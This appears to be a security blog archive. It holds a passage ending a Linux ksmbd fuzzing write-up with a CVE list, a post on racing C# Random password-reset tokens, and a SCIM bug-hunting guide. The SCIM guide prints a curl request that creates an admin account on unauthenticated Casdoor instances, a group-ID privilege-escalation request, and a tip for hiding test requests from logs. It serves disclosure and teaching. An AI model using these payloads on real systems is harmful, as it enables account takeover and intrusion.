syz_ksmbd_send_req(&(0x7f0000001440)=ANY=[@ANYBLOB="000008c0fe534d4240000000000000000b0001000000000000000000030000000000000000000000010000000100000000000000684155244ffb955e3201e88679ed735a39000000040214000400000000000000000000000000000078000000480800000000010000000000000000000000010001"], 0x8c4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000000200)={0x58, @smb2_oplock_break_req={{}, 0x12, {0x1, 0x0, 0x0, 0x9, 0x0, 0x1, 0x1, "3c66dd1fe856ec397e7f8d7c8c293fd6"}, 0x24}}, 0x5c, &(0x7f0000000000)=ANY=[@ANYBLOB="00000080fe534d424000010000000000050001000800000000000000040000000000000000000000010000000100000000000000b31fae29f7ea148ad156304f457214a539000000020000000000000000000000000000000000000000000002"], 0x84, &(0x7f0000000100)=ANY=[@ANYBLOB="00000062fe534d4240000000000000000e00010000000000000000000700000000000000000000000100000001000000000000000002000000ffff0000000000000000002100030a08000000040000000000000000000000000000006000020009000000aedf"], 0x66, 0x0, 0x0) (async)
...

Observe the async keyword automatically added during the fuzzing process, which allows running commands in parallel without blocking, implemented in this commit fd8caa5. Hence, no UAF was missed due to the seemingly absent parallelism.

In the end, based on syzkaller’s benchmark, we executed 20-30 processes per second in 20 VMs, which still potentially meant running several hundred commands. For reference, we used a server with an average configuration - nothing particularly optimized for fuzzing performance.

We measured coverage using syzkaller’s built-in function-level metrics. While we’re aware that this does not capture state transitions, which are critical in a protocol like SMB, it still provides a useful approximation of code exercised. Overall, the fs/smb/server directory reached around 60%. For smb2pdu.c specifically, which handles most SMB command parsing and dispatch, we reached 70%.

The screenshot below shows coverage across key files.

Discovered Bugs

During our research period, we reported a grand total of 23 bugs. The majority of the bugs are use-after-frees or out-of-bounds read or write findings. Given this quantity, it is natural that the impact differs. For instance, fix the warning from __kernel_write_iter is a simple warning that could only be used for DoS in a specific setup (kernel.panic_on_warn), validate zero num_subauth before sub_auth is accessed is a simple out-of-bounds 1-byte read, and prevent rename with empty string will only cause a kernel oops.

There are additional issues where exploitability requires more thoughtful analysis (e.g., fix type confusion via race condition when using ipc_msg_send_request). Nevertheless, after evaluating potentially promising candidates, we were able to identify some powerful primitives, allowing an attacker to exploit the finding at least locally to gain remote code execution.

The identified issues are listed below:

Description	Commit	CVE
prevent out-of-bounds stream writes by validating *pos	0ca6df4	CVE-2025-37947
prevent rename with empty string	53e3e5b	CVE-2025-37956
fix use-after-free in ksmbd_session_rpc_open	a1f46c9	CVE-2025-37926
fix the warning from __kernel_write_iter	b37f2f3	CVE-2025-37775
fix use-after-free in smb_break_all_levII_oplock()	18b4fac	CVE-2025-37776
fix use-after-free in __smb2_lease_break_noti()	21a4e47	CVE-2025-37777
validate zero num_subauth before sub_auth is accessed	bf21e29	CVE-2025-22038
fix overflow in dacloffset bounds check	beff0bc	CVE-2025-22039
fix use-after-free in ksmbd_sessions_deregister()	15a9605	CVE-2025-22041
fix r_count dec/increment mismatch	ddb7ea3	CVE-2025-22074
add bounds check for create lease context	bab703e	CVE-2025-22042
add bounds check for durable handle context	542027e	CVE-2025-22043
prevent connection release during oplock break notification	3aa660c	CVE-2025-21955
fix use-after-free in ksmbd_free_work_struct	bb39ed4	CVE-2025-21967
fix use-after-free in smb2_lock	84d2d16	CVE-2025-21945
fix bug on trap in smb2_lock	e26e2d2	CVE-2025-21944
fix out-of-bounds in parse_sec_desc()	d6e13e1	CVE-2025-21946
fix type confusion via race condition when using ipc_msg_send_req..	e2ff19f	CVE-2025-21947
align aux_payload_buf to avoid OOB reads in cryptographic operati..	06a0254	-
check outstanding simultaneous SMB operations	0a77d94	CVE-2024-50285
fix slab-use-after-free in smb3_preauth_hash_rsp	b8fc56f	CVE-2024-50283
fix slab-use-after-free in ksmbd_smb2_session_create	c119f4e	CVE-2024-50286
fix slab-out-of-bounds in smb2_allocate_rsp_buf	0a77715	CVE-2024-26980

Note that we are aware of the controversy around CVE assignment since the Linux kernel became a CVE Numbering Authority (CNA) in February 2024. My personal take is that, while there were many disputable cases, the current approach is pragmatic: CVEs are now assigned for fixes with potential security impact, particularly memory corruptions and other classes of bugs that could potentially be exploitable.

For more information, the whole process is described in detail in this great presentation, or the relevant article. Lastly, the voting process for CVE approval is implemented in the vulns.git repository.

Conclusion

Our research yielded a few dozen bugs, although using pseudo-syscalls is generally discouraged and comes with several disadvantages. For instance, in all cases, we had to perform the triaging process manually by finding the relevant crash log entries, generating C programs, and minimizing them by hand.

Since syscalls can be tied using resources, this method could also be applied to ksmbd, which involves sending packets. It would be ideal for future research to explore this direction - SMB commands could yield resources that are then fed into different commands. Due to time restrictions, we followed the pseudo-syscall approach, relying on custom patches.

In the next and final part, we focus on exploiting CVE-2025-37947.


Trivial C# Random Exploitation

2025-08-19T00:00:00+02:00

Exploiting random number generators requires math, right? Thanks to C#’s Random, that is not necessarily the case! I ran into an HTTP 2.0 web service issuing password reset tokens from a custom encoding of (new Random()).Next(min, max) output. This led to a critical account takeover. Exploitation did not require scripting, math or libraries. Just several clicks in Burp. While I had source code, I will show a method of discovering and exploiting this vulnerability in a black-box or bug-bounty style engagement.

The exploit uses no math, but I do like math. So, there is a bonus section on how to optimize and invert Random.

The Vulnerability

I can’t share the client code, but it was something like this:

var num = new Random().Next(min, max);
var token = make_password_reset_token(num);
save_reset_token_to_db(user, token);
return issue_password_reset(user.email, token);

This represents a typical password reset. The token is created using Random(), and there is no seed. This gets encoded to an alphanumeric token. The token is sent to the user in email. The user can then log in with their email and token.

This may be trivially exploitable.

How the C# PRNG Works

Somehow, the documentation linked me to the following reference implementation. This is not the real implementation, but it’s good enough. Don’t get into the weeds here; Random(int Seed) is only displayed for the sake of context.

Git link

      public Random()
        : this(Environment.TickCount) {
      }

      public Random(int Seed) {
        int ii;
        int mj, mk;

        //Initialize our Seed array.
        //This algorithm comes from Numerical Recipes in C (2nd Ed.)
        int subtraction = (Seed == Int32.MinValue) ? Int32.MaxValue : Math.Abs(Seed);
        mj = MSEED - subtraction;
        SeedArray[55]=mj; // [2]
        mk=1;
        for (int i=1; i<55; i++) {  //Apparently the range [1..55] is special (Knuth) and so we're wasting the 0'th position.
          ii = (21*i)%55;
          SeedArray[ii]=mk;
          mk = mj - mk;
          if (mk<0) mk+=MBIG;
          mj=SeedArray[ii];
        }
        for (int k=1; k<5; k++) {
          for (int i=1; i<56; i++) {
        SeedArray[i] -= SeedArray[1+(i+30)%55];
        if (SeedArray[i]<0) SeedArray[i]+=MBIG;
          }
        }
        inext=0;
        inextp = 21;
        Seed = 1;
      }

This whole system hinges on the 32-bit Seed, which builds the internal state (SeedArray[55]) with some ugly math. If Random is initialized without an argument, Environment.TickCount is used as the Seed. All output of a PRNG is determined by its seed. In this case, it’s the TickCount, which is essentially just time. So you can think of this whole algorithm as emailing you the time, just with a very odd encoding.

In some sense, you can even submit a time to encode. You do this, not with a URL parameter but by waiting. Wait for the right time and you get the encoding you want. What time, or event, should we wait for?

The Exploit

The documentation says it best.

In .NET Framework, the default seed value is derived from the system clock, which has finite resolution. As a result, different Random objects that are created in close succession by a call to the parameterless constructor have identical default seed values and, therefore, produce identical sets of random numbers.

If we submit two requests in the same 1ms window, we get the same Seed. Same seed, same output: the same reset token is sent to two email addresses. One email we own, of course; the other belongs to an admin.
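To see the "same seed, same output" property without a .NET runtime, here is a rough Python port of the reference listing above. The class name, the tick value, and the min/max range are made up for illustration, MSEED (161803398) is taken from the reference source, and only ranges smaller than Int32.MaxValue are handled.

```python
MBIG = 0x7FFFFFFF   # Int32.MaxValue
MSEED = 161803398

def _int32(x: int) -> int:
    """Wrap to a signed 32-bit value, like unchecked C# int arithmetic."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x & 0x80000000 else x

class LegacyRandom:
    def __init__(self, seed: int):
        subtraction = MBIG if seed == -0x80000000 else abs(seed)
        arr = [0] * 56
        mj = _int32(MSEED - subtraction)
        arr[55] = mj
        mk = 1
        for i in range(1, 55):
            ii = (21 * i) % 55
            arr[ii] = mk
            mk = _int32(mj - mk)
            if mk < 0:
                mk += MBIG
            mj = arr[ii]
        for _ in range(4):
            for i in range(1, 56):
                v = _int32(arr[i] - arr[1 + (i + 30) % 55])
                arr[i] = v + MBIG if v < 0 else v
        self.seed_array, self.inext, self.inextp = arr, 0, 21

    def _internal_sample(self) -> int:
        self.inext = 1 if self.inext + 1 >= 56 else self.inext + 1
        self.inextp = 1 if self.inextp + 1 >= 56 else self.inextp + 1
        ret = _int32(self.seed_array[self.inext] - self.seed_array[self.inextp])
        if ret == MBIG:
            ret -= 1
        if ret < 0:
            ret += MBIG
        self.seed_array[self.inext] = ret
        return ret

    def next_in_range(self, min_value: int, max_value: int) -> int:
        """Port of Next(min, max) for ranges that fit in an Int32."""
        sample = self._internal_sample() * (1.0 / MBIG)
        return int(sample * (max_value - min_value)) + min_value

tick = 123456789  # hypothetical Environment.TickCount shared by two requests
mine = LegacyRandom(tick).next_in_range(100000, 999999)
admin = LegacyRandom(tick).next_in_range(100000, 999999)
print(mine == admin)  # True
```

Two requests handled within the same tick go through exactly this computation, so whatever encoding is applied afterwards produces the same token twice.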

How do we hit the 1ms window? We use the single packet attack.

Will it really work though?

Blackbox Methodology

You don’t want to go spamming admins with reset emails before you even verify the vulnerability. So make two accounts on the website that you control. While you can do the attack with one account, it’s prone to false positives. You’re sending two account resets in rapid succession. The second request may write a different reset token to the DB before the email service reads the first, resulting in a false positive.

Use Burp’s Repeater groups to perform the single packet attack to reset both accounts. Check your email for duplicate tokens. If you fail, go on testing other stuff until the lockout window dies. Then just hit send again; you likely don’t need to worry about keeping a session token alive.

Note: Burp displays round trip time in the lower-right corner of Repeater.

Keep an eye on that number. Each request has its own time. For me, it took about 10 requests before I got a duplicate token. That only occurred when the difference in round trip times was 1ms or less.

When launching the actual exploit, the only way to check whether your token matches the victim account’s is to log in. Login requests tend to be rate limited and guarded. So first verify with testing accounts. Use that to obtain a delta time window that works. Then, when launching the actual exploit, only attempt to log in when the delta time is within your testing bounds.

Ah… I guess subtracting two times counts as math. Exploiting PRNGs always requires math.

Wrapping Up

This attack is not completely novel. I have seen similar attacks used in CTFs. It’s a nice lesson on time though. We control time by waiting, or not waiting. If a secret token is just an encoded time, you can duplicate them by duplicating time.

If you look into the .NET runtime enough, you can convince yourself this attack won’t work. Random has more than one implementation; the one my client should have used does not seed by time. I can even prove this with dotnetfiddle. This is like the security version of “it works on my computer”. This is why we test “secure” code and why we fuzz with random input. So try this exploit next time you see a security token.

This applies to more than just C#’s Random. Consider Python’s uuid. The documentation warns of potential collisions due to lack of “synchronization” depending on “underlying platform”, unless SafeUUID is used. I wonder if the attack will work there? Only one way to find out.

The fix for weak PRNG vulnerabilities is always to check the documentation. In this case you have to click the “Supplemental API remarks for Random.” in the “Remarks” section to get to the security info where it says:

To generate a cryptographically secure random number, such as one that’s suitable for creating a random password, use one of the static methods in the System.Security.Cryptography.RandomNumberGenerator class.

So, in C#, use RandomNumberGenerator instead of Random.
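The same advice carries over to other languages. As a point of comparison only (this is not the client's code), Python's standard counterpart is the `secrets` module, which draws from the operating system's CSPRNG rather than a seedable generator. The `new_reset_token` name and the 32-byte size are assumptions for this sketch.

```python
import secrets


def new_reset_token(nbytes: int = 32) -> str:
    """Return a URL-safe reset token backed by the OS CSPRNG (never by random.Random)."""
    return secrets.token_urlsafe(nbytes)


print(new_reset_token())
```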

Bonus: Cracking C#’s Old Random Algorithm

Ahead is some math. It’s not too bad, but I figured I would warn you. This is the “hard” way to exploit this finding. I wrote a library that can predict the output of Random::Next. It can also invert it, to go back to the seed. Or you can find the first output from the seventh output. None of this requires brute force, just a single modular equation. The code can be found here.

I intended this to be a fun weekend math project. Things got messed up when I found collisions due to an int underflow.

Seeding Is All Just Math

Let’s look at the seed algorithm, but try to generalize what you see. The SeedArray[55] is obviously the internal state of the PRNG. This is built up with “math”. If you look closely, almost every time SeedArray[i] is assigned, it’s with a subtraction. Right afterward you always see a check: did the subtraction result in a negative number? If so, add MBIG. In other words, all the subtraction is done mod MBIG.

The MBIG value is Int32.MaxValue, aka 0x7fffffff, aka 2^31 - 1. This is a Mersenne prime. Doing math, mod’ing a prime results in what math people call a Galois field. We only say that because Évariste Galois was so cool. A Galois field is just a nice way of saying “we can do all the normal algebra tricks we learned since middle school, even though this isn’t normal math”.

So, let’s say SeedArray[i] is some a*Seed + b mod MBIG. It gets changed in a loop though by subtracting some other c*Seed + d mod MBIG. We don’t need that loop - algebra says to just compute (a-c)*Seed + (b-d) mod MBIG. By churning through the loop doing algebra you can get every element of SeedArray in the form of a*Seed + b mod MBIG.
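To make the "just do algebra" step concrete, here is a minimal sketch of carrying a*Seed + b around as a pair of coefficients. The `Affine` class and the toy coefficients are made up for illustration; this is not the csharp_rand implementation.

```python
from dataclasses import dataclass

MBIG = 2**31 - 1  # Int32.MaxValue, a Mersenne prime


@dataclass(frozen=True)
class Affine:
    """Represents a*Seed + b (mod MBIG) without knowing Seed yet."""
    a: int
    b: int

    def __sub__(self, other: "Affine") -> "Affine":
        # Subtracting two equations subtracts their coefficients, mod MBIG.
        return Affine((self.a - other.a) % MBIG, (self.b - other.b) % MBIG)

    def resolve(self, seed: int) -> int:
        # Plug in a concrete seed.
        return (self.a * seed + self.b) % MBIG


x = Affine(5, 7)    # toy values, not real SeedArray entries
y = Affine(2, 10)
z = x - y           # (5-2)*Seed + (7-10) mod MBIG
print(z, z.resolve(42))
```

The symbolic subtraction and the numeric one agree for any seed, which is what lets the loop be replaced by coefficient bookkeeping.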

Every time the PRNG is sampled, Random::InternalSample is called. That is just another subtraction. The result is both returned and used to set some element of SeedArray. It’s just some equation again. It’s still in the Galois field, it’s still just algebra and you can invert all of these equations. Given one output of Random::Next we can invert the corresponding equation and get the original Seed.

But, we can do more too!

csharp_rand.py library

The library I made builds SeedArray from these equations. It will output in terms of these equations. Let’s get the equation that represents the first output of Random for any Seed:

>>> from csharp_rand import csharp_rand
>>> cs = csharp_rand()
>>> first = cs.sample_equation(0)
>>> print(first)
rand = seed * 1121899819 + 1559595546 mod 2147483647

This represents the first output of Random for any seed. Use .resolve(42) to get the output of new Random(42).Next().

>>> first.resolve(42)
1434747710

Or invert and resolve 1434747710 to find out what seed will produce 1434747710 for the first output of Random.

>>> first.invert().resolve(1434747710)
42

This agrees with (dotnetfiddle).
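For the curious, the same two results can be reproduced without the library, using only the constants printed in the equation above. This is a sketch of the underlying modular algebra, assuming a non-negative seed below MBIG and Python 3.8+ (for the three-argument `pow` with a negative exponent); the function names are mine.

```python
MBIG = 2**31 - 1
A, B = 1121899819, 1559595546  # coefficients from the printed first-output equation


def first_output(seed: int) -> int:
    """Evaluate rand = seed * A + B mod MBIG."""
    return (seed * A + B) % MBIG


def seed_from_first_output(rand: int) -> int:
    """Invert the equation: seed = (rand - B) * A^-1 mod MBIG."""
    return ((rand - B) * pow(A, -1, MBIG)) % MBIG


print(first_output(42))                    # 1434747710
print(seed_from_first_output(1434747710))  # 42
```

The inverse exists because MBIG is prime, so every non-zero coefficient has a multiplicative inverse.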

See the readme for more complicated examples.

An int Underflow in Random

Having just finished my library, I excitedly showed it to the first person who would listen to me. Of course it failed. There must be a bug and of course I blamed the original implementation. But since account takeover bugs don’t care about my feelings, I fixed the code… mostly…

In short, the original implementation has an int underflow which throws the math equations off for certain seed values. Only certain SeedArray elements are affected. For example, the following shows the first output of Random does not need any adjustment, but the 13th output does.

>>> print(cs.sample_equation(0))
rand = seed * 1121899819 + 1559595546 mod 2147483647
>>> print(cs.sample_equation(12))
rand = seed * 1476289907 + 1358625013 mod 2147483647 underflow adjustment: -2

So the 13th output will be seed * 1476289907 + 1358625013, unless the seed causes an underflow, then it will be off by -2. The library attempts to decide on its own whether the underflow occurs. This works great until you invert things.

Consider, what seed value will produce 908112456 as the 13th output of Random::Next?

>>> cs.sample_equation(12).invert().resolve2(908112456)
(619861032, 161844078)

Both seeds, 619861032 and 161844078, will produce 908112456 on the 13th output (poc). Seed 619861032 does it the proper way, from the non-adjusted equation. Seed 161844078 gets there from the underflow. This “collision” means there are exactly 2 seeds that produce the same output. This means 908112456 is 2x more likely to occur on the 13th output than on the first. It also means there is no seed that will produce 908112458 on the 13th output of Random. A quick brute force produced some 80K+ other “collisions” just like this one.
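The collision can be checked by hand from the printed 13th-output equation. The sketch below only evaluates that equation; it takes the text's word that seed 161844078 is one of the seeds that underflows, and it does not try to predict which seeds do.

```python
MBIG = 2**31 - 1
A13, B13 = 1476289907, 1358625013  # coefficients from the printed 13th-output equation
UNDERFLOW_ADJUSTMENT = -2          # from the same printout


def thirteenth_unadjusted(seed: int) -> int:
    """Evaluate the 13th-output equation, ignoring any underflow."""
    return (seed * A13 + B13) % MBIG


proper = thirteenth_unadjusted(619861032)   # lands directly on the target
shifted = thirteenth_unadjusted(161844078)  # lands two above the target

print(proper, shifted, shifted + UNDERFLOW_ADJUSTMENT)
```

The second seed would have been the only way to reach 908112458, which is why that value never shows up on the 13th output.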

Bonus Conclusion

Sometimes the smart way is dumb. What started as a fun math thing ended up feeling like death by a thousand cuts. It’s better to version match and language match your exploit and get it going fast. If it takes a long time, start optimizing while it’s still running. But before you optimize, TEST! Test everything! Otherwise you will run a brute force for hours and get nothing. Why? Well, maybe Random(Environment.TickCount) is not Random() because explicitly seeding results in a different algorithm! Ugh…. I am going to go audit some more endpoints…

SCIM Hunting - Beyond SSO

2025-05-08T00:00:00+02:00

Introduction

Single Sign-On (SSO) related bugs have gotten an incredible amount of hype and a lot of amazing public disclosures in recent years. Just to cite a few examples:

And so on - there is a lot of gold out there.

Not surprisingly, systems using a custom implementation are the most affected since integrating SSO with a platform’s User object model is not trivial.

However, while SSO often takes center stage, another standard is often under-tested - SCIM (System for Cross-domain Identity Management). In this blogpost we will dive into its core aspects & the insecure design issues we often find while testing our clients’ implementations.


SCIM 101
Hunting for Bugs
Extra Focus Areas
Conclusions

SCIM 101

SCIM is a standard designed to automate the provisioning and deprovisioning of user accounts across systems, ensuring access consistency between the connected parts.

The standard is defined in the following RFCs: RFC7642, RFC7644, RFC7643.

While it is not specifically designed to be an IdP-to-SP protocol, but rather a generic user pool syncing protocol for cloud environments, real-world scenarios mostly embed it in the IdP-SP relationship.

Core Components

To make a long story short, the standard defines a set of RESTful APIs exposed by the Service Providers (SP) which should be callable by other actors (mostly Identity Providers) to update the users pool.

It provides REST APIs with the following set of operations to edit the managed objects (see scim.cloud):

Create: POST https://example-SP.com/{v}/{resource}
Read: GET https://example-SP.com/{v}/{resource}/{id}
Replace: PUT https://example-SP.com/{v}/{resource}/{id}
Delete: DELETE https://example-SP.com/{v}/{resource}/{id}
Update: PATCH https://example-SP.com/{v}/{resource}/{id}
Search: GET https://example-SP.com/{v}/{resource}?<SEARCH_PARAMS>
Bulk: POST https://example-SP.com/{v}/Bulk

So, we can summarize SCIM as a set of APIs usable to perform CRUD operations on a set of JSON-encoded objects representing user identities.
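When scripting tests against an SP, it can help to keep the operations listed above in a small lookup table. The sketch below is just that list turned into data; the `build_request` helper and the sample values (`v2`, `Users`, `42`) are assumptions for illustration.

```python
# Operation name -> (HTTP method, path template), mirroring the list above.
SCIM_OPERATIONS = {
    "create":  ("POST",   "/{v}/{resource}"),
    "read":    ("GET",    "/{v}/{resource}/{id}"),
    "replace": ("PUT",    "/{v}/{resource}/{id}"),
    "delete":  ("DELETE", "/{v}/{resource}/{id}"),
    "update":  ("PATCH",  "/{v}/{resource}/{id}"),
    "search":  ("GET",    "/{v}/{resource}?{query}"),
    "bulk":    ("POST",   "/{v}/Bulk"),
}


def build_request(base_url: str, operation: str, **params: str) -> tuple:
    """Return (method, url) for a SCIM operation; unused params are ignored."""
    method, template = SCIM_OPERATIONS[operation]
    return method, base_url.rstrip("/") + template.format(**params)


print(build_request("https://example-SP.com", "read", v="v2", resource="Users", id="42"))
```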

Core Functionalities

If you want to look into a SCIM implementation for bugs, here is a list of core functionalities that would need to be reviewed during an audit:

Server Config & Authn/z Middlewares - SCIM does not define its authn/authz method, hence it will always be custom
SCIM Object to Internal Objects Mapping Function - How the backend converts / links the SCIM objects to the internal Users and Groups objects. Most of the time, the internal objects are more complex and have tons of constraints and/or safety checks.
A few examples: internal attributes that should not be user-controlled, platform-specific attributes not allowed in SCIM, etc.
Operations Exec Logic - Changes within identity-related objects typically trigger application flows. A few examples include: email update should trigger a confirmation flow / flag the user as unconfirmed, username update should trigger ownership / pending invitations / re-auth checks and so on.

Mind The Impact

Since SCIM is a direct IdP-to-SP communication channel, most of the resulting issues will require a certain level of access in either the IdP or the SP. Hence, the complexity of an attack may lower the severity of most of your findings. On the other hand, the impact might skyrocket in multi-tenant platforms, where SCIM users may lack the usual tenant-isolation logic.

Hunting for Bugs

The following are some juicy examples of bugs you should look for while auditing SCIM implementations.

Auth Bypasses

A few months ago we published our advisory for Unauthenticated SCIM Operations In Casdoor IdP Instances. Casdoor is an open-source identity solution supporting various auth standards such as OAuth, SAML, OIDC, etc. Of course SCIM was included, but as a service, meaning that Casdoor (the IdP) would also allow external actors to manipulate its users pool.

Casdoor utilized the elimity-com/scim library, which, by default, does not include authentication in its configuration as per the standard. Consequently, a SCIM server defined and exposed using this library remains unauthenticated.

server := scim.Server{
    Config:        config,
    ResourceTypes: resourceTypes,
}
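Whatever library serves the SCIM routes, the missing piece is a check in front of them. The following is a framework-agnostic sketch of a bearer token check, not the elimity-com/scim API and not Casdoor's fix; the `is_authorized` name and the plain `dict` of headers are assumptions.

```python
import hmac


def is_authorized(headers: dict, expected_token: str) -> bool:
    """Accept a request only if it carries the expected SCIM bearer token."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not token or not expected_token:
        # Missing header, wrong scheme, or an unconfigured secret: fail closed.
        return False
    # Constant-time comparison avoids leaking how much of the token matched.
    return hmac.compare_digest(token.encode(), expected_token.encode())


print(is_authorized({"Authorization": "Bearer s3cret"}, "s3cret"))
print(is_authorized({}, "s3cret"))
```

Note the fail-closed branch for an empty configured secret: an unset token should never turn into "everyone is allowed".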

Exploiting an instance required emails matching the configured domains. A SCIM POST operation was usable to create a new user matching the internal email domain and data.

➜ curl --path-as-is -i -s -k -X $'POST' \
 -H $'Content-Type: application/scim+json' -H $'Content-Length: 377' \
 --data-binary $'{\"active\":true,\"displayName\":\"Admin\",\"emails\":[{\"value\":
\"admin2@victim.com\"}],\"password\":\"12345678\",\"nickName\":\"Attacker\",
\"schemas\":[\"urn:ietf:params:scim:schemas:core:2.0:User\",
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\"],
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\":{\"organization\":
\"built-in\"},\"userName\":\"admin2\",\"userType\":\"normal-user\"}' \
 $'https://<CASDOOR_INSTANCE>/scim/Users'

Then, authenticate to the IdP dashboard with the new admin user admin2:12345678.

Note: The maintainers released a new version (v1.812.0), which includes a fix.

While that was a very simple yet critical issue, bypasses can also be found in authenticated implementations. In other cases, the service may be available only internally but left unprotected.

SCIM Token Management

[*] IdP-Side Issues

Since SCIM secrets allow dangerous actions on the Service Providers, they should be protected from extractions happening after the setup. Testing or editing an IdP SCIM integration on a configured application should require a new SCIM token as input, if the connector URL differs from the one previously set.

A famous IdP was found to be issuing the SCIM integration test requests to /v1/api/scim/Users?startIndex=1&count=1 with the old secret while accepting a new baseURL.
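The rule the IdP should have enforced fits in a few lines. This is a hypothetical sketch (the function name, parameters and strict string comparison of URLs are all assumptions), meant only to show the decision, not any vendor's code.

```python
from typing import Optional


def secret_for_connection_test(stored_url: str, stored_secret: str,
                               submitted_url: str,
                               submitted_secret: Optional[str] = None) -> str:
    """Pick the secret to send with a SCIM integration test request."""
    if submitted_secret:
        # The admin typed a token for this test: use it, never the stored one.
        return submitted_secret
    if submitted_url == stored_url:
        # Same destination as before: reusing the stored secret leaks nothing new.
        return stored_secret
    # New destination without a new token: refuse instead of leaking the old secret.
    raise PermissionError("connector URL changed: a new SCIM token is required")


print(secret_for_connection_test("https://sp.example/scim", "old", "https://sp.example/scim"))
```

When testing an IdP, the interesting request is the third branch: change the base URL to a server you control, leave the token field untouched, and watch what arrives.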

+1 Extra - Covering traces: Avoid logging errors by mocking a response JSON with the expected data for a successful SCIM integration test. An example mock response’s JSON for a Users query:

{
    "Resources": [
        {
            "externalId": "<EXTID>",
            "id": "francesco+scim@doyensec.com",
            "meta": {
                "created": "2024-05-29T22:15:41.649622965Z",
                "location": "/Users/francesco+scim@doyensec.com",
                "version": "<VERSION>"
            },
            "schemas": [
                "urn:ietf:params:scim:schemas:core:2.0:User"
            ],
            "userName": "francesco+scim@doyensec.com"
        }
    ],
    "itemsPerPage": 2,
    "schemas": [
        "urn:ietf:params:scim:api:messages:2.0:ListResponse"
    ],
    "startIndex": 1,
    "totalResults": 8
}

[*] SP-Side Issues

The SCIM token creation & read should be allowed only to highly privileged users. Target the SP endpoints used to manage it and look for authorization issues or target it with a nice XSS or other vulnerabilities to escalate the access level in the platform.

Unwanted User Re-provisioning Fallbacks

Since ~real-time user access management is the core of SCIM, it is also worth looking for fallbacks causing a deprovisioned user to be back with access to the SP.

As an example, let’s look at the update_scimUser function below.

def can_be_reprovisioned?(usrObj)
  return true if usrObj.respond_to?(:active) && !usrObj.active?
  false
end

def update_scimUser(usrObj)
  # [...]
  if parser.deprovision_user?
    # [...]
  #  (o)__(o)'
  elsif can_be_reprovisioned?(usrObj)
    reprovision(usrObj)
  else
    true
  end
end

Since respond_to?(:active) is always true for SCIM identities, the check reduces to !usrObj.active?. Whenever the user is not active, the condition is true and causes the re-provisioning.

Consequently, any SCIM update request (e.g., change lastname) will fall back to re-provisioning if the user was not active for any reason (e.g., logical ban, forced removal).
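One way to avoid the fallback is to tie re-provisioning to what the request actually asks for, rather than to the user's current state alone. The sketch below is an assumption about a possible fix, not the client's patch, and whether a banned user may ever be re-activated over SCIM remains a separate policy decision.

```python
def should_reprovision(user_active: bool, patch_attributes: dict) -> bool:
    """Re-provision only when an inactive user is explicitly set back to active."""
    return (not user_active) and patch_attributes.get("active") is True


# A last name change on a deprovisioned user must not bring the account back.
print(should_reprovision(False, {"name": {"familyName": "Rossi"}}))
# An explicit activation request is the only trigger.
print(should_reprovision(False, {"active": True}))
```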

Internal Attributes Manipulation

While outsourcing identity syncing to SCIM, it becomes critical to choose what will be copied from the SCIM objects into the new internal ones, since bugs may arise from an “excessive” attribute allowance.

[*] Example 1 - Privesc To Internal Roles

A client supported Okta Groups and Users to be provisioned and updated via SCIM endpoints.

It converted Okta Groups into internal roles with custom labeling to refer to “Okta resources”. In particular, the function resource_to_access_map constructed an unvalidated access mapping from the supplied SCIM group resource.

[...]
    group_data, decode_error := decode_group_resource(resource.Attributes.AsMap())

    var role_list []string
    //  (o)__(o)'
    if resource.Id != "" {
        role_list = []string{resource.Id}
    }
    //...
    return access_map, nil, nil

The implementation issue resided in the fact that the role names in role_list were constructed on an Id attribute (urn:ietf:params:scim:schemas:core:2.0:Group) passed from a third-party source.

Later, another function upserted the Role objects, constructed from the SCIM event, without further checks. Hence, it was possible to overwrite any existing resource in the platform by matching its name in a SCIM Group ID.

As an example, if the SCIM Group resource ID was set to an internal role name, funny things happened.

POST /api/scim/Groups HTTP/1.1
Host: <PLATFORM>
Content-Type: application/json; charset=utf-8
Authorization: Bearer 650…[REDACTED]…
…[REDACTED]…
Content-Length: 283

{
    "schemas": ["urn:ietf:params:scim:schemas:core:2.0:Group"],
    "id":"superadmin",
    "displayName": "TEST_NAME",
    "members": [{
        "value": "francesco@doyensec.com",
        "display": "francesco@doyensec.com"
    }]
}

The platform created an access map named TEST_NAME, granting the superadmin role to members.
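A defensive mapping would never let a third-party identifier land in the same namespace as internal roles. The sketch below shows one possible approach under stated assumptions: the reserved role names, the `okta:` prefix and the `role_name_for_group` helper are all hypothetical.

```python
RESERVED_ROLES = {"superadmin", "admin", "owner"}  # hypothetical internal role names


def role_name_for_group(group_id: str) -> str:
    """Map a SCIM Group id to a namespaced role name, refusing internal names."""
    normalized = group_id.strip().lower()
    if not normalized:
        raise ValueError("empty SCIM group id")
    if normalized in RESERVED_ROLES:
        raise ValueError("SCIM group id collides with an internal role")
    # The prefix keeps externally supplied names out of the internal namespace.
    return "okta:" + normalized


print(role_name_for_group("engineering"))
```

The prefix alone already prevents the overwrite; the reserved-name check is there to make the attempt loud instead of silent.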

[*] Example 2 - Mass Assignment In SCIM-To-User Mapping

Manipulation of other internal attributes may be possible depending on the object mapping strategy. A juicy example could look like the one below.

SSO_user.update!(
        external_id: scim_data["externalId"],
        #         (o)__(o)' 
        userData: Oj.load(scim_req_body),
      )

Even if Oj defaults are overwritten (sorry, no deserialization) it could still be possible to put any data in the SCIM request and have it accessible through userData. The logic is assuming it will only contain SCIM attributes.
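The usual remedy for this kind of mass assignment is an explicit allowlist applied before anything is stored. A minimal sketch, assuming a hypothetical set of attributes the platform actually wants to keep:

```python
import json

# Hypothetical allowlist: only attributes the platform expects from SCIM.
ALLOWED_ATTRIBUTES = {"userName", "displayName", "emails", "externalId", "active"}


def filter_scim_attributes(raw_body: str) -> dict:
    """Parse a SCIM request body and keep only allowlisted top-level attributes."""
    data = json.loads(raw_body)
    if not isinstance(data, dict):
        raise ValueError("SCIM resource must be a JSON object")
    return {key: value for key, value in data.items() if key in ALLOWED_ATTRIBUTES}


print(filter_scim_attributes('{"userName": "bob", "is_admin": true}'))
```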

Verification Bypasses

This category contains all the bugs arising from required internal user-management processes not being applied to updates caused by SCIM events (e.g., email / phone / userName verification).

An interesting related finding is Gitlab Bypass Email Verification (CVE-2019-5473). We have found similar cases involving the bypass of code verification processes during our assessments as well.

[*] Example - Same-Same But With Code Bypass

A SCIM email change did not trigger the typical confirmation flow requested with other email change operations.

